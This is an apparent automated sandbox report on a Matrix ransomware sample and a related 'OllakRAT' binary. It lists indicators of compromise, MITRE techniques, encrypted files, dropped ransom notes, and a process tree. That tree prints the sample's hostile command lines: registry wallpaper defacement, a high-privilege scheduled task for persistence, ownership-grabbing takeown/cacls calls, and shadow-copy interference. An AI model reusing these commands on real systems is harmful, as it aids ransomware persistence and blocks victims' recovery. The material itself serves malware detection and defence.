C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/4776-5172-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/2580-5644-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/3084-6372-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5512-6867-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5884-6919-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/2180-7066-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5804-7072-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5920-7182-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5920-7181-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/4592-7253-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5436-7758-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5800-7844-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5164-7846-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/1508-7848-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/1636-7852-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5532-7854-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/6040-7857-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/3768-7859-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5644-7865-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/5776-7867-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/3216-7869-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx
behavioral2/memory/2864-7871-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe	upx

Drops desktop.ini file(s) 27 IoCs

Processes:

MatrixRansomware.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	MatrixRansomware.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

OllakRAT64.exeMatrixRansomware.exe

description	ioc	process
File opened (read-only)	\??\P:	OllakRAT64.exe
File opened (read-only)	\??\X:	OllakRAT64.exe
File opened (read-only)	\??\Q:	MatrixRansomware.exe
File opened (read-only)	\??\N:	MatrixRansomware.exe
File opened (read-only)	\??\J:	MatrixRansomware.exe
File opened (read-only)	\??\G:	MatrixRansomware.exe
File opened (read-only)	\??\I:	OllakRAT64.exe
File opened (read-only)	\??\U:	OllakRAT64.exe
File opened (read-only)	\??\Y:	OllakRAT64.exe
File opened (read-only)	\??\W:	MatrixRansomware.exe
File opened (read-only)	\??\E:	OllakRAT64.exe
File opened (read-only)	\??\G:	OllakRAT64.exe
File opened (read-only)	\??\O:	OllakRAT64.exe
File opened (read-only)	\??\T:	OllakRAT64.exe
File opened (read-only)	\??\V:	MatrixRansomware.exe
File opened (read-only)	\??\J:	OllakRAT64.exe
File opened (read-only)	\??\W:	OllakRAT64.exe
File opened (read-only)	\??\P:	MatrixRansomware.exe
File opened (read-only)	\??\E:	MatrixRansomware.exe
File opened (read-only)	\??\V:	OllakRAT64.exe
File opened (read-only)	\??\Z:	OllakRAT64.exe
File opened (read-only)	\??\Q:	OllakRAT64.exe
File opened (read-only)	\??\Y:	MatrixRansomware.exe
File opened (read-only)	\??\M:	MatrixRansomware.exe
File opened (read-only)	\??\I:	MatrixRansomware.exe
File opened (read-only)	\??\A:	OllakRAT64.exe
File opened (read-only)	\??\L:	OllakRAT64.exe
File opened (read-only)	\??\K:	MatrixRansomware.exe
File opened (read-only)	\??\B:	OllakRAT64.exe
File opened (read-only)	\??\K:	OllakRAT64.exe
File opened (read-only)	\??\M:	OllakRAT64.exe
File opened (read-only)	\??\N:	OllakRAT64.exe
File opened (read-only)	\??\R:	OllakRAT64.exe
File opened (read-only)	\??\X:	MatrixRansomware.exe
File opened (read-only)	\??\T:	MatrixRansomware.exe
File opened (read-only)	\??\O:	MatrixRansomware.exe
File opened (read-only)	\??\L:	MatrixRansomware.exe
File opened (read-only)	\??\H:	MatrixRansomware.exe
File opened (read-only)	\??\S:	OllakRAT64.exe
File opened (read-only)	\??\Z:	MatrixRansomware.exe
File opened (read-only)	\??\U:	MatrixRansomware.exe
File opened (read-only)	\??\S:	MatrixRansomware.exe
File opened (read-only)	\??\R:	MatrixRansomware.exe
File opened (read-only)	\??\H:	OllakRAT64.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\mFW42U8f.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

MatrixRansomware.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\en-US.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\serialver.exe	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\OpenDeny.wmf	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ur.pak	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\hr.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sv.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\klist.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\gu.pak.DATA	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\bin\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\rmid.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.cfg	MatrixRansomware.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.175.29\MicrosoftEdgeUpdateCore.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-options.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\is.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jmc.ini	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\nexturl.ort	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\cy.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler64.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ne.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets	MatrixRansomware.exe
File created	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Social.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\te.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-progress.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_100_percent.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\java.security	MatrixRansomware.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5772 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

5068 vssadmin.exe

pid	process
5772	schtasks.exe

pid	process
5068	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

OllakRAT64.exe

pid	process
4476	OllakRAT64.exe
4476	OllakRAT64.exe
4476	OllakRAT64.exe
4476	OllakRAT64.exe
4476	OllakRAT64.exe
4476	OllakRAT64.exe
4476	OllakRAT64.exe
4476	OllakRAT64.exe
4476	OllakRAT64.exe
4476	OllakRAT64.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

OllakRAT64.exe

pid process

4476 OllakRAT64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

takeown.exeOllakRAT64.execacls.exetakeown.exetakeown.exeOllakRAT.exetakeown.exetakeown.exetakeown.exetakeown.execmd.exetakeown.exetakeown.execmd.exetakeown.exetakeown.exevssvc.exetakeown.exetakeown.execacls.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	2612	takeown.exe
Token: SeDebugPrivilege	4476	OllakRAT64.exe
Token: SeLoadDriverPrivilege	4476	OllakRAT64.exe
Token: SeTakeOwnershipPrivilege	3324	cacls.exe
Token: SeTakeOwnershipPrivilege	5948	takeown.exe
Token: SeTakeOwnershipPrivilege	5124	takeown.exe
Token: SeTakeOwnershipPrivilege	5532	OllakRAT.exe
Token: SeTakeOwnershipPrivilege	5700	takeown.exe
Token: SeTakeOwnershipPrivilege	5636	takeown.exe
Token: SeTakeOwnershipPrivilege	3664	takeown.exe
Token: SeTakeOwnershipPrivilege	5980	takeown.exe
Token: SeTakeOwnershipPrivilege	5264	cmd.exe
Token: SeTakeOwnershipPrivilege	6132	takeown.exe
Token: SeTakeOwnershipPrivilege	4508	takeown.exe
Token: SeTakeOwnershipPrivilege	5584	cmd.exe
Token: SeTakeOwnershipPrivilege	5556	takeown.exe
Token: SeTakeOwnershipPrivilege	4748	takeown.exe
Token: SeBackupPrivilege	4408	vssvc.exe
Token: SeRestorePrivilege	4408	vssvc.exe
Token: SeAuditPrivilege	4408	vssvc.exe
Token: SeTakeOwnershipPrivilege	5780	takeown.exe
Token: SeTakeOwnershipPrivilege	5564	takeown.exe
Token: SeIncreaseQuotaPrivilege	3780	cacls.exe
Token: SeSecurityPrivilege	3780	cacls.exe
Token: SeTakeOwnershipPrivilege	3780	cacls.exe
Token: SeLoadDriverPrivilege	3780	cacls.exe
Token: SeSystemProfilePrivilege	3780	cacls.exe
Token: SeSystemtimePrivilege	3780	cacls.exe
Token: SeProfSingleProcessPrivilege	3780	cacls.exe
Token: SeIncBasePriorityPrivilege	3780	cacls.exe
Token: SeCreatePagefilePrivilege	3780	cacls.exe
Token: SeBackupPrivilege	3780	cacls.exe
Token: SeRestorePrivilege	3780	cacls.exe
Token: SeShutdownPrivilege	3780	cacls.exe
Token: SeDebugPrivilege	3780	cacls.exe
Token: SeSystemEnvironmentPrivilege	3780	cacls.exe
Token: SeRemoteShutdownPrivilege	3780	cacls.exe
Token: SeUndockPrivilege	3780	cacls.exe
Token: SeManageVolumePrivilege	3780	cacls.exe
Token: 33	3780	cacls.exe
Token: 34	3780	cacls.exe
Token: 35	3780	cacls.exe
Token: 36	3780	cacls.exe
Token: SeIncreaseQuotaPrivilege	3780	cacls.exe
Token: SeSecurityPrivilege	3780	cacls.exe
Token: SeTakeOwnershipPrivilege	3780	cacls.exe
Token: SeLoadDriverPrivilege	3780	cacls.exe
Token: SeSystemProfilePrivilege	3780	cacls.exe
Token: SeSystemtimePrivilege	3780	cacls.exe
Token: SeProfSingleProcessPrivilege	3780	cacls.exe
Token: SeIncBasePriorityPrivilege	3780	cacls.exe
Token: SeCreatePagefilePrivilege	3780	cacls.exe
Token: SeBackupPrivilege	3780	cacls.exe
Token: SeRestorePrivilege	3780	cacls.exe
Token: SeShutdownPrivilege	3780	cacls.exe
Token: SeDebugPrivilege	3780	cacls.exe
Token: SeSystemEnvironmentPrivilege	3780	cacls.exe
Token: SeRemoteShutdownPrivilege	3780	cacls.exe
Token: SeUndockPrivilege	3780	cacls.exe
Token: SeManageVolumePrivilege	3780	cacls.exe
Token: 33	3780	cacls.exe
Token: 34	3780	cacls.exe
Token: 35	3780	cacls.exe
Token: 36	3780	cacls.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

MatrixRansomware.execmd.execmd.execmd.execmd.exeOllakRAT.execmd.execmd.execmd.exe

description	pid	process	target process
PID 720 wrote to memory of 2108	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 2108	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 2108	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 3204	720	MatrixRansomware.exe	NW1RVsE0.exe
PID 720 wrote to memory of 3204	720	MatrixRansomware.exe	NW1RVsE0.exe
PID 720 wrote to memory of 3204	720	MatrixRansomware.exe	NW1RVsE0.exe
PID 720 wrote to memory of 4572	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 4572	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 4572	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 2196	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 2196	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 2196	720	MatrixRansomware.exe	cmd.exe
PID 4572 wrote to memory of 4124	4572	cmd.exe	reg.exe
PID 4572 wrote to memory of 4124	4572	cmd.exe	reg.exe
PID 4572 wrote to memory of 4124	4572	cmd.exe	reg.exe
PID 2196 wrote to memory of 2396	2196	cmd.exe	wscript.exe
PID 2196 wrote to memory of 2396	2196	cmd.exe	wscript.exe
PID 2196 wrote to memory of 2396	2196	cmd.exe	wscript.exe
PID 720 wrote to memory of 1744	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 1744	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 1744	720	MatrixRansomware.exe	cmd.exe
PID 4572 wrote to memory of 1192	4572	cmd.exe	reg.exe
PID 4572 wrote to memory of 1192	4572	cmd.exe	reg.exe
PID 4572 wrote to memory of 1192	4572	cmd.exe	reg.exe
PID 4572 wrote to memory of 4372	4572	cmd.exe	reg.exe
PID 4572 wrote to memory of 4372	4572	cmd.exe	reg.exe
PID 4572 wrote to memory of 4372	4572	cmd.exe	reg.exe
PID 1744 wrote to memory of 4804	1744	cmd.exe	cacls.exe
PID 1744 wrote to memory of 4804	1744	cmd.exe	cacls.exe
PID 1744 wrote to memory of 4804	1744	cmd.exe	cacls.exe
PID 1744 wrote to memory of 2612	1744	cmd.exe	takeown.exe
PID 1744 wrote to memory of 2612	1744	cmd.exe	takeown.exe
PID 1744 wrote to memory of 2612	1744	cmd.exe	takeown.exe
PID 1744 wrote to memory of 1348	1744	cmd.exe	cmd.exe
PID 1744 wrote to memory of 1348	1744	cmd.exe	cmd.exe
PID 1744 wrote to memory of 1348	1744	cmd.exe	cmd.exe
PID 1348 wrote to memory of 3848	1348	cmd.exe	OllakRAT.exe
PID 1348 wrote to memory of 3848	1348	cmd.exe	OllakRAT.exe
PID 1348 wrote to memory of 3848	1348	cmd.exe	OllakRAT.exe
PID 3848 wrote to memory of 4476	3848	OllakRAT.exe	OllakRAT64.exe
PID 3848 wrote to memory of 4476	3848	OllakRAT.exe	OllakRAT64.exe
PID 720 wrote to memory of 3084	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 3084	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 3084	720	MatrixRansomware.exe	cmd.exe
PID 3084 wrote to memory of 6100	3084	cmd.exe	cacls.exe
PID 3084 wrote to memory of 6100	3084	cmd.exe	cacls.exe
PID 3084 wrote to memory of 6100	3084	cmd.exe	cacls.exe
PID 3084 wrote to memory of 5272	3084	cmd.exe	takeown.exe
PID 3084 wrote to memory of 5272	3084	cmd.exe	takeown.exe
PID 3084 wrote to memory of 5272	3084	cmd.exe	takeown.exe
PID 3084 wrote to memory of 5700	3084	cmd.exe	cmd.exe
PID 3084 wrote to memory of 5700	3084	cmd.exe	cmd.exe
PID 3084 wrote to memory of 5700	3084	cmd.exe	cmd.exe
PID 5700 wrote to memory of 5308	5700	cmd.exe	OllakRAT.exe
PID 5700 wrote to memory of 5308	5700	cmd.exe	OllakRAT.exe
PID 5700 wrote to memory of 5308	5700	cmd.exe	OllakRAT.exe
PID 3084 wrote to memory of 4052	3084	cmd.exe	OllakRAT.exe
PID 3084 wrote to memory of 4052	3084	cmd.exe	OllakRAT.exe
PID 3084 wrote to memory of 4052	3084	cmd.exe	OllakRAT.exe
PID 720 wrote to memory of 5624	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 5624	720	MatrixRansomware.exe	cmd.exe
PID 720 wrote to memory of 5624	720	MatrixRansomware.exe	cmd.exe
PID 5624 wrote to memory of 1884	5624	cmd.exe	cacls.exe
PID 5624 wrote to memory of 1884	5624	cmd.exe	cacls.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe
"C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:720
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe" "C:\Users\Admin\AppData\Local\Temp\NW1RVsE0.exe"
  2⤵
  PID:2108
- C:\Users\Admin\AppData\Local\Temp\NW1RVsE0.exe
  "C:\Users\Admin\AppData\Local\Temp\NW1RVsE0.exe" -n
  2⤵
  - Executes dropped EXE
  PID:3204
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\mFW42U8f.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4572
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\mFW42U8f.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:4124
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:4372
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\9OG3Vr2A.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2196
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\9OG3Vr2A.vbs"
    3⤵
    - Checks computer location settings
    PID:2396
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\bOcTXSdl.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:4376
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\bOcTXSdl.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:5772
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:4136
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
